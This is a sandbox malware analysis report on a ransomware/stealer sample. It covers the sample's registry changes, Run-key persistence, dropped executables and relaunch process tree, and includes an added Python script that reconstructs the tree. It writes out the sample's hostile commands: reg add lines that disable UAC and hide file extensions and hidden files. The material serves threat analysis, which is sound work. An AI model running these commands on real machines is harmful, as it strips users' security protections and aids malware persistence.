Malware Analysis Report

2025-03-15 04:20

Sample ID 241026-ad2hyaxgmm
Target 8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e
SHA256 8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e
Tags
discovery evasion persistence spyware stealer trojan ransomware
score
10/10

Analysis Overview

Threat Level: Known bad

The file 8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e was found to be: Known bad.

Malicious Activity Summary

UAC bypass

Modifies visibility of file extensions in Explorer

Renames multiple (85) files with added filename extension

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Deletes itself

Checks computer location settings

Adds Run key to start application

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Analysis: static1

Detonation Overview

Reported

2024-10-26 00:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-26 00:06

Reported

2024-10-26 00:09

Platform

win7-20240903-en

Max time kernel

150s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\International\Geo\Nation C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe N/A
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\hqEcIcQw.exe = "C:\\Users\\Admin\\PuoQwQAo\\hqEcIcQw.exe" C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\hqEcIcQw.exe = "C:\\Users\\Admin\\PuoQwQAo\\hqEcIcQw.exe" C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fAMIYEgY.exe = "C:\\ProgramData\\LOAkMAgs\\fAMIYEgY.exe" C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fAMIYEgY.exe = "C:\\ProgramData\\LOAkMAgs\\fAMIYEgY.exe" C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\pdffile_8.ico C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
(64 identical rows)

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
(64 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\ProgramData\LOAkMAgs\fAMIYEgY.exe N/A
(64 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe (4 writes)
PID 2128 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\ProgramData\LOAkMAgs\fAMIYEgY.exe (4 writes)
PID 2128 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe (4 writes)
PID 1708 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe (4 writes)
PID 2128 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe (4 writes)
PID 2128 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe (4 writes)
PID 2128 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe (4 writes)
PID 2128 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe (4 writes)
PID 2608 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe (4 writes)
PID 2872 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe (4 writes)
PID 2116 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe (4 writes)
PID 2872 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe (4 writes)
PID 2872 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe (4 writes)
PID 2872 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe (4 writes)
PID 2872 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe (4 writes)
PID 2648 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe (4 writes)
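The sixteen distinct parent/child pairs in the WriteProcessMemory table above, together with the three reg add command lines listed under Processes below, are enough to reconstruct what the sample does on the host without reading the rest of the report. The following Python script is an added example written for this page; it is not output of the sandbox. It parses those rows (copied from this report into the script as constructed input, one row per pair) into a process tree, measures how many times the sample relaunches itself through cmd.exe, and decodes each reg add into key, value name and data so the settings being flipped can be named. The text in KNOWN_SETTINGS is the editor's reading of each setting, not something the report states.

```python
"""Process tree from the report's WriteProcessMemory rows plus decoding of its
'reg add' command lines.  Added example for this page, not sandbox output."""
import re
from collections import defaultdict
SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe")
CMD, REG = r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\reg.exe"
CSCRIPT = r"C:\Windows\SysWOW64\cscript.exe"
# Constructed input: one WriteProcessMemory row per parent/child pair, copied from
# the report in its order (the report logs several writes for each pair).
WPM_ROWS = [
    f"PID 2128 wrote to memory of 2724 N/A {SAMPLE} C:\\Users\\Admin\\PuoQwQAo\\hqEcIcQw.exe",
    f"PID 2128 wrote to memory of 2808 N/A {SAMPLE} C:\\ProgramData\\LOAkMAgs\\fAMIYEgY.exe",
    f"PID 2128 wrote to memory of 1708 N/A {SAMPLE} {CMD}",
    f"PID 1708 wrote to memory of 2872 N/A {CMD} {SAMPLE}",
    f"PID 2128 wrote to memory of 2616 N/A {SAMPLE} {REG}",
    f"PID 2128 wrote to memory of 2716 N/A {SAMPLE} {REG}",
    f"PID 2128 wrote to memory of 2824 N/A {SAMPLE} {REG}",
    f"PID 2128 wrote to memory of 2608 N/A {SAMPLE} {CMD}",
    f"PID 2608 wrote to memory of 2204 N/A {CMD} {CSCRIPT}",
    f"PID 2872 wrote to memory of 2116 N/A {SAMPLE} {CMD}",
    f"PID 2116 wrote to memory of 2052 N/A {CMD} {SAMPLE}",
    f"PID 2872 wrote to memory of 2488 N/A {SAMPLE} {REG}",
    f"PID 2872 wrote to memory of 1264 N/A {SAMPLE} {REG}",
    f"PID 2872 wrote to memory of 320 N/A {SAMPLE} {REG}",
    f"PID 2872 wrote to memory of 2648 N/A {SAMPLE} {CMD}",
    f"PID 2648 wrote to memory of 1640 N/A {CMD} {CSCRIPT}",
]
# The three reg add command lines from the Processes list (note the two flag orders).
REG_CMDS = [
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1",
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2",
    r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f",
]
WPM_ROW = re.compile(r"PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)")

def build_tree(rows):
    """Return (image_by_pid, children_by_pid); repeated rows for a pair become one edge."""
    image, children = {}, defaultdict(list)
    for row in rows:
        m = WPM_ROW.fullmatch(row.strip())
        if not m:
            continue
        ppid, cpid = int(m.group(1)), int(m.group(2))
        image.setdefault(ppid, m.group(3))
        image.setdefault(cpid, m.group(4))
        if cpid not in children[ppid]:
            children[ppid].append(cpid)
    return image, children

def roots(children):
    """PIDs that write into others but were never written into."""
    written = {c for kids in children.values() for c in kids}
    return [p for p in children if p not in written]

def render(image, children, pid, depth=0):
    """Indented 'pid basename' lines, depth-first, in report order."""
    name = image[pid].rsplit("\\", 1)[-1]
    lines = [f"{'  ' * depth}{pid} {name}"]
    for c in children.get(pid, []):
        lines.extend(render(image, children, c, depth + 1))
    return lines

def sample_generations(image, children, pid, sample=SAMPLE):
    """Longest chain of sample instances under pid: the cmd /c relaunch loop."""
    here = 1 if image[pid] == sample else 0
    below = [sample_generations(image, children, c, sample) for c in children.get(pid, [])]
    return here + max(below, default=0)

def parse_reg_add(cmdline):
    """'reg add <key> [/v name] [/t type] [/d data] [/f]' -> dict, any flag order."""
    tok = cmdline.split()
    if len(tok) < 3 or [t.lower() for t in tok[:2]] != ["reg", "add"]:
        return None
    entry = {"key": tok[2], "value": None, "type": None, "data": None, "force": False}
    names = {"/v": "value", "/t": "type", "/d": "data"}
    for i, flag in enumerate(tok[3:], start=3):
        if flag.lower() == "/f":
            entry["force"] = True
        elif flag.lower() in names and i + 1 < len(tok):
            entry[names[flag.lower()]] = tok[i + 1]
    return entry

# Editor's reading of what each written setting does; not taken from the report.
KNOWN_SETTINGS = {
    ("explorer\\advanced", "hidefileext", "1"): "Explorer hides file extensions; a dropped .exe can pose as a document",
    ("explorer\\advanced", "hidden", "2"): "Explorer stops showing hidden files and folders",
    ("policies\\system", "enablelua", "0"): "UAC disabled; HKLM write, so it needs an already elevated process and a restart to take effect",
}

def explain(entry):
    """Match a parsed reg add to KNOWN_SETTINGS by key suffix, value name and data."""
    if not entry or entry["value"] is None:
        return None
    key, value = entry["key"].lower(), entry["value"].lower()
    for (suffix, name, data), text in KNOWN_SETTINGS.items():
        if key.endswith(suffix) and value == name and entry["data"] == data:
            return text
    return None

if __name__ == "__main__":
    image, children = build_tree(WPM_ROWS)
    print("\n".join(render(image, children, roots(children)[0])))
    print([explain(parse_reg_add(c)) for c in REG_CMDS])
```

Run as-is, the tree has a single root, PID 2128, and three generations of the sample along the 2128 > 1708 > 2872 > 2116 > 2052 path, each generation spawning its own three reg.exe children and a cmd.exe > cscript.exe pair. Two points to keep in mind when reading the reg add output: the HKCU writes succeed for any user and show up the next time Explorer reads its view settings, whereas the EnableLUA write goes to HKLM, so it only succeeds when the sample is already running elevated (the sandbox runs it as Admin) and the UAC change needs a restart to take full effect.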

Processes

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

"C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe"

C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe

"C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe"

C:\ProgramData\LOAkMAgs\fAMIYEgY.exe

"C:\ProgramData\LOAkMAgs\fAMIYEgY.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NkkkYksA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zosYwkwY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NwIgIscw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\SigIswUE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

